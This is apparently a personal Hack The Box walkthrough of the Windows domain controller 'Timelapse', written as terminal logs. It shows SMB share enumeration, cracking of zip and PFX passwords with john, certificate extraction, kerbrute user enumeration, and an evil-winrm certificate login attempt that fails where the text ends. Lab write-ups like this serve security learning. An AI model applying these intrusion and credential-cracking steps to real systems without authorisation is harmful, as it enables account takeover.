Timelapse

This is a windows machine from hack the box.

Nmap scan

                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Nmap scan report for 10.10.11.152
Host is up (0.35s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  tcpwrapped
88/tcp   open  tcpwrapped
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  tcpwrapped
389/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h59m58s
| smb2-time: 
|   date: 2023-09-14T20:19:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.74 seconds
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

low hanging fruit 445 and this is a domain controller

└─$ crackmapexec smb  10.10.11.152  -u "" up ""
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]

Domain is timelapse.htb

I add it to etc/hosts

U nano 7.2                                                                                                      /etc/hosts                                                                                                               
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb

using ldapsearch but we get nothing

kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=timelapse,DC=htb
namingcontexts: CN=Configuration,DC=timelapse,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingcontexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingcontexts: DC=ForestDnsZones,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub 
# extended LDIF
#
# LDAPv3
# base <DC=timelapse,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
kali@kali ~/H/timelapse [1]> 

try anonymous rpcclient

kali@kali ~/H/timelapse> rpcclient 10.10.11.152 -U ''
Password for [WORKGROUP\]:
rpcclient

gt; ls command not found: ls rpcclient

gt; enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient

gt; netshareenum result was WERR_ACCESS_DENIED rpcclient

gt; 

Tried unauthenticated getNPusers.py. No luck

Impacket v0.11.0 - Copyright 2023 Fortra

[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
kali@kali /u/s/d/p/examples> 


smbclient anonymously

kali@kali /u/s/d/p/examples> smbclient -L //10.10.11.152
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali /u/s/d/p/examples> 

folder called shares. we try to access this anonymously

kali@kali /u/s/d/p/examples> smbclient //10.10.11.152/shares -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali /u/s/d/p/examples [1]> 

tried enum4linux

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 14 08:45:06 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.11.152 )===================================


[+] Server 10.10.11.152 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.11.152 )================================

Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.11.152 )=================================

do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.152

enum4linux complete on Thu Sep 14 08:45:31 2023

kali@kali /u/s/d/p/examples> 

connecting to the shares folder anonymously

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 1295497 blocks available
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 1294828 blocks available
smb: \dev\> get winrm_backup.zip
getting file \dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \dev\> cd ../
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021
cd helpde
                6367231 blocks of size 4096. 1293430 blocks available
smb: \> cd Helpdesk
smb: \Helpdesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

                6367231 blocks of size 4096. 1292493 blocks available
smb: \Helpdesk\> get *.*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \Helpdesk\*.*
smb: \Helpdesk\> get LAPS.x64.msi

parallel_read returned NT_STATUS_IO_TIMEOUT

^C
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021
get 
                6367231 blocks of size 4096. 1287503 blocks available
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (25.5 KiloBytes/sec) (average 25.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (215.3 KiloBytes/sec) (average 105.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (36.6 KiloBytes/sec) (average 90.4 KiloBytes/sec)
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (323.6 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \HelpDesk\> 

We donload all the files locally

We will first check the docs. ChatGP says to read the docs we need to install libreoffice-writer


sudo apt update
sudo apt install libreoffice-writer

once installed – libreoffice –writer LAPS_Datasheet.docx

After installing

                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ dpkg -l | grep libreoffice-writer

ii  libreoffice-writer                             4:7.5.5-4                             amd64        office productivity suite -- word processor
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

we find that the document was prepared bya a “Jiri Formacek” but this is a microsoft employee. Well get back to this document later

Cannot open the zip file. Seems password protected

pse]
└─$ 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
   skipping: legacyy_dev_auth.pfx    incorrect password
                                                           

I am going to try and see whether users dev and helpdesk exist

└─$ cat users.txt          
dev
helpdesk
administrator
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

using kerbrute – they dont exist

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d  timelapse.HTB users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop

2023/09/14 09:14:04 >  Using KDC(s):
2023/09/14 09:14:04 >   10.10.11.152:88

2023/09/14 09:14:04 >  [+] VALID USERNAME:       [email protected]
2023/09/14 09:14:04 >  Done! Tested 3 usernames (1 valid) in 0.412 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

Asked chatGPT how to read the MSI


sudo apt install msitools
msitools extract LAPS.x64.msi outdir/
msiextract LAPS.x64.msi outdir/

ran the above

└─$ msiextract LAPS.x64.msi outdir/

PolicyDefinitions/en-US/AdmPwd.adml
PolicyDefinitions/AdmPwd.admx
LAPS/AdmPwd.UI.exe
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.Utils.dll
LAPS/AdmPwd.Utils.dll
LAPS/CSE/AdmPwd.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.psd1
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.format.ps1xml
WindowsPowershell/v1.0/Modules/AdmPwd.PS/en-US/AdmPwd.PS.dll-Help.xml

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.zip
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd LAPS           
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe  AdmPwd.Utils.dll  CSE
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd CSE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ ls
AdmPwd.dll
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ cd ../
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe  AdmPwd.Utils.dll  CSE
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd ../
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.zip
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0             
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules 
                                                                                                                     
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
                                                                                                                     
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ 

I am a bit stuck so i will go back to the zip file and see if we can brute force it with john

with the following steps by chatGPT

john

zip2john winrm_backup.zip > winrm_backup.hash

john winrm_backup.hash

john –show winrm_backup.hash

Found the password – supremelegacy

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.hash
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt          winrm_backup.zip
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell


Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2023-09-14 09:50) 1.923g/s 6679Kp/s 6679Kc/s 6679KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably

unzipping the file

ing: legacyy_dev_auth.pfx    
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls                        
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         legacyy_dev_auth.pfx  WindowsPowershell
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  PolicyDefinitions     winrm_backup.hash
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      users.txt             winrm_backup.zip
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat legacyy_dev_auth.pfx

Fo–und the file — legacyy_dev_auth.pfx

from chatGPT

The `.pfx` file is a PKCS#12 archive, which usually contains both a private key and its corresponding X.509 digital certificate. You can use `openssl` to manage and read these files.

To extract the private key from the `.pfx` file:  openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
To extract the certificate from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

We try the above but the password does not work

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem

Enter Import Password:
Mac verify error: invalid password?
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

Enter Import Password:
Mac verify error: invalid password?
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

Enter Import Password:
Mac verify error: invalid password?
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

We are going to try anbd bruteforce the password

ChatGPT suggests we use pfx2joh.py which we install via

git clone https://github.com/magnumripper/JohnTheRipper.git

cd JohnTheRipper/src
./configure && make

Then we run the command inside the run folder to bruteforce

┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ ./pfx2john.py ~/HTB/timelapse/legacyy_dev_auth.pfx > pfx.hash

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:02:58 DONE (2023-09-14 10:09) 0.005616g/s 18148p/s 18148c/s 18148C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ 


password is thuglegacy

we run the two command again

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -out legacyy_dev_auth.pem

Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap    kerbrute                          LAPS.x64.msi          privatekey.pem     winrm_backup.zip
cascade.nmap     LAPS                              legacyy_dev_auth.pem  temp.pem
cascade.xml      LAPS_Datasheet.docx               legacyy_dev_auth.pfx  users.txt
certificate.crt  LAPS_OperationsGuide.docx         pfx.hash              WindowsPowershell
JohnTheRipper    LAPS_TechnicalSpecification.docx  PolicyDefinitions     winrm_backup.hash
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat certificate.crt     
Bag Attributes
    localKeyID: 01 00 00 00 
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat privatekey.pem 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

viewing the cert . Again, advice by chatGPT — openssl x509 -in certificate.crt -text -noout

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl x509 -in certificate.crt -text -noout

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Legacyy
        Validity
            Not Before: Oct 25 14:05:52 2021 GMT
            Not After : Oct 25 14:15:52 2031 GMT
        Subject: CN = Legacyy
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:
                    71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:
                    fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:
                    85:af:03:10:af:28:cf:1a:42:c1:e9:bf:7b:68:a7:
                    0a:50:f9:86:d1:64:3b:b5:37:1c:a1:bd:f3:4d:4d:
                    15:e3:74:54:15:f6:72:22:2a:4a:30:3a:de:a0:1b:
                    61:7e:f4:ee:60:54:5e:0f:02:71:cf:9b:e6:18:3f:
                    0b:1b:a1:19:18:57:c4:0e:a7:32:22:e8:d3:19:80:
                    30:89:ae:02:12:59:99:94:1e:a4:e1:c9:b1:56:ff:
                    b3:ce:99:ed:60:b3:ab:62:37:55:c5:a0:fb:b5:cc:
                    d3:98:68:82:f7:76:d6:5a:6b:35:dc:2f:0e:88:a5:
                    32:51:3c:90:16:1a:db:6a:c8:5a:26:99:8a:c9:a8:
                    2c:c2:49:a5:ae:f6:31:b4:a7:58:4a:2b:b9:a4:eb:
                    0b:c1:49:1f:10:7c:75:b6:a9:7f:7e:35:b2:ca:7a:
                    00:ad:fb:f8:c0:6b:ab:b6:57:d9:6e:f8:ad:cc:0b:
                    63:5a:4b:33:a8:22:2e:47:2c:c8:e7:ae:e8:d1:a0:
                    2c:77:bf:a6:57:2f:42:8f:08:5c:c3:30:4a:8b:14:
                    91:f1
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Subject Alternative Name: 
                othername: UPN::[email protected]
            X509v3 Subject Key Identifier: 
                CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        5f:8e:fb:76:bf:de:3e:fe:96:fd:da:72:c8:4b:8a:e7:6b:b0:
        88:2a:ba:9a:9b:de:ba:1f:c9:05:ea:de:e9:1d:93:e5:10:36:
        4c:af:5e:ee:e7:49:2f:4c:dd:43:e0:fb:65:0a:e7:7d:49:a3:
        ec:a2:44:9b:28:da:05:81:7d:4a:35:7e:66:ef:61:74:dc:a0:
        8b:22:68:75:cf:89:6d:c6:c7:3a:26:03:a0:9d:c0:aa:74:57:
        d7:de:dd:04:cb:74:7b:28:6c:7a:ad:e2:ed:bd:4e:05:67:e9:
        e1:be:55:d3:78:9f:cf:01:77:3f:7f:06:b6:ad:f8:8f:b1:f5:
        79:d5:64:ce:60:4c:dc:82:99:e0:74:72:6d:06:a9:ae:37:0d:
        ed:9c:42:a6:80:ca:a9:eb:92:98:ce:92:93:be:f3:35:26:38:
        48:e6:dc:46:86:a6:dd:59:b9:f6:95:2e:30:8c:6c:b7:60:64:
        59:c3:aa:0c:eb:ae:c6:17:5d:d5:ab:65:f7:58:76:4a:e4:d6:
        8f:fb:92:9a:c1:df:c9:f8:cb:3a:ae:26:34:3c:36:e1:9f:1d:
        78:de:f2:22:a0:76:0c:88:60:a7:2a:c1:dd:5a:23:2b:1b:65:
        16:2c:ea:1e:52:b9:54:9a:9a:f4:eb:d9:18:fe:79:fb:fb:34:

I see a user [email protected]

Using kerbrute to see if its valid and it is valid

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nano users.txt                                               
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d  timelapse.HTB users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop

2023/09/14 10:20:03 >  Using KDC(s):
2023/09/14 10:20:03 >   10.10.11.152:88

2023/09/14 10:20:03 >  [+] VALID USERNAME:       [email protected]
2023/09/14 10:20:03 >  [+] VALID USERNAME:       [email protected]
2023/09/14 10:20:03 >  Done! Tested 4 usernames (2 valid) in 0.349 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

we try getNPusers but no luck getting hash

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py timelapse.HTB/legacyy                         
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate legacyy, getting its TGT
[-] User legacyy doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

chatGPT suggests that we can use cert and pem. Intersting

evil-winrm -i [TARGET_IP] -u [USERNAME] -c /path/to/certificate.crt -k /path/to/privatekey.pem

tried the command but failked

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem 

/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:72:in `validate_required_fields': password is a required option (RuntimeError)
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:59:in `validate'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:31:in `create_with_defaults'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:64:in `configure_connection_opts'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:27:in `initialize'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `new'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `connection_initialization'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:496:in `main'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:1029:in `<top (required)>'
        from /usr/bin/evil-winrm:25:in `load'
        from /usr/bin/evil-winrm:25:in `<main>'
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
